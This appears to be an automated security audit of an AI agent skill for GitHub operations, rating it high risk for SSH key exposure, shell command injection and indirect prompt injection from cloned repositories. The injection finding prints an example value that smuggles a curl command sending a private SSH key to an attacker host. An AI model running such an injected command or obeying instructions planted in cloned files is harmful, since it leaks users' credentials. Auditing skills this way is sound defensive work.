github

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH
Tags: CREDENTIALS_UNSAFE, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, DATA_EXFILTRATION
Full Analysis
  • [Data Exposure & Exfiltration] (HIGH): The skill explicitly references and utilizes a sensitive private SSH key located at ~/.ssh/github_ed25519. Accessing or exposing paths to private keys is a high-severity finding as it facilitates credential theft and unauthorized remote access.
  • [Unverifiable Dependencies & Remote Code Execution] (HIGH): The skill constructs shell commands (e.g., git clone, cd && git pull) by directly interpolating user-provided strings for repository names and owners. Without proper sanitization or use of safe APIs, an attacker could inject malicious shell commands using metacharacters like ;, &&, or | (e.g., reponame; curl http://attacker.com/leak?data=$(cat ~/.ssh/id_rsa)).
  • [Indirect Prompt Injection] (LOW):
      • Ingestion points: Untrusted data enters the environment through git clone and git pull from external sources (e.g., anthropics/claude-code).
      • Boundary markers: None. There are no instructions or delimiters to prevent the agent from following malicious instructions contained within the files of the cloned repositories.
      • Capability inventory: The skill possesses powerful capabilities including shell command execution (git, ssh, cd), filesystem writes, and network operations (git push, git pull).
      • Sanitization: None. The content of the repositories is not scanned or validated before being placed into the local workspace.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 17, 2026, 06:34 PM